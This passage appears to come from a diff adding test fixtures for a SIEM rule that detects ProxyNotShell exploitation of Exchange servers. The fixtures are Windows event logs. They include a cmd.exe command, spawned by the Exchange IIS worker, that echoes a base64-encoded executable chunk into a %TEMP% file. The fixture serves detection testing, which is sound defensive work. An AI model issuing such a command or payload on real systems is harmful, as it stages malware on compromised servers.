"object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAeGg3SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAABqtgAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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>>%%TEMP%%\\RsJnf.b64", "object.process.cwd": "c:\\windows\\system32\\inetsrv\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "d5e182b9-2e60-6424-c625-000000002700", "object.process.id": "2276", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangePowerShellAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipm6ed2a926-10ba-4360-834b-895310382a0a -h \"C:\\inetpub\\temp\\apppools\\MSExchangePowerShellAppPool\\MSExchangePowerShellAppPool.config\" -w \"\" -m 0", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.guid": "d5e182b9-3724-641b-d100-000000002700", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "src.host": "rhangnsivabvi", "src.hostname": "rhangnsivabvi", "src.ip": "10.155.1.6", "src.port": 45342, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1999687082-732736654-454791560-1114", "subject.account.name": "k_ivanov", "subject.account.privileges": "local user rights", "subject.account.session_id": "883698059"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_2.sc new file mode 100644 index 00000000..f4f4dfd9 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_2.sc @@ -0,0 +1,6 @@ +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:08.920039600Z\"},\"EventRecordID\":\"8695702\",\"Correlation\":{\"ActivityID\":\"{4f904282-5ce1-0000-b842-904fe15cd901}\"},\"Execution\":{\"ProcessID\":\"620\",\"ThreadID\":\"19016\"},\"Channel\":\"Security\",\"Computer\":\"exchange.example.com\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-0-0\",\"Name\":\"SubjectUserSid\"},{\"text\":\"-\",\"Name\":\"SubjectUserName\"},{\"text\":\"-\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x0\",\"Name\":\"SubjectLogonId\"},{\"text\":\"S-1-5-21-1999687082-732736654-454791560-1114\",\"Name\":\"TargetUserSid\"},{\"text\":\"k_ivanov\",\"Name\":\"TargetUserName\"},{\"text\":\"example\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x34abfbec\",\"Name\":\"TargetLogonId\"},{\"text\":\"3\",\"Name\":\"LogonType\"},{\"text\":\"NtLmSsp \",\"Name\":\"LogonProcessName\"},{\"text\":\"NTLM\",\"Name\":\"AuthenticationPackageName\"},{\"text\":\"nBnaxyPFEkbxE\",\"Name\":\"WorkstationName\"},{\"text\":\"{00000000-0000-0000-0000-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"-\",\"Name\":\"TransmittedServices\"},{\"text\":\"NTLM V2\",\"Name\":\"LmPackageName\"},{\"text\":\"128\",\"Name\":\"KeyLength\"},{\"text\":\"0x0\",\"Name\":\"ProcessId\"},{\"text\":\"-\",\"Name\":\"ProcessName\"},{\"text\":\"10.155.1.6\",\"Name\":\"IpAddress\"},{\"text\":\"45248\",\"Name\":\"IpPort\"},{\"text\":\"%%1833\",\"Name\":\"ImpersonationLevel\"},{\"text\":\"-\",\"Name\":\"RestrictedAdminMode\"},{\"text\":\"-\",\"Name\":\"TargetOutboundUserName\"},{\"text\":\"-\",\"Name\":\"TargetOutboundDomainName\"},{\"text\":\"%%1843\",\"Name\":\"VirtualAccount\"},{\"text\":\"0x0\",\"Name\":\"TargetLinkedLogonId\"},{\"text\":\"%%1843\",\"Name\":\"ElevatedToken\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "chain_id": "4f904282-5ce1-0000-b842-904fe15cd901", "datafield6": "Network", "datafield9": "NTLM", "dst.fqdn": "exchange.example.com", "dst.host": "exchange.example.com", "dst.hostname": "exchange", "event_src.category": "AAA", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "NtLmSsp", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "system", "object.property": "session ID with ElevatedToken", "object.value": "0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T10:05:03.447Z", "src.host": "nbnaxypfekbxe", "src.hostname": "nbnaxypfekbxe", "src.ip": "10.155.1.6", "src.port": 45248, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1999687082-732736654-454791560-1114", "subject.account.name": "k_ivanov", "subject.account.privileges": "local user rights", "subject.account.session_id": "883686380", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:08.920Z", "type": "raw", "uuid": "74608fb7-f7f9-4d0d-a154-cd2bdb868b7a"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:08.946651100Z\"},\"EventRecordID\":\"8695706\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"16476\"},\"Channel\":\"Security\",\"Computer\":\"exchange.example.com\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-5-18\",\"Name\":\"SubjectUserSid\"},{\"text\":\"EXCHANGE$\",\"Name\":\"SubjectUserName\"},{\"text\":\"example\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x3e7\",\"Name\":\"SubjectLogonId\"},{\"text\":\"0x8e4\",\"Name\":\"NewProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Name\":\"NewProcessName\"},{\"text\":\"%%1936\",\"Name\":\"TokenElevationType\"},{\"text\":\"0x2890\",\"Name\":\"ProcessId\"},{\"text\":\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAeGg3SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAABqtgAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA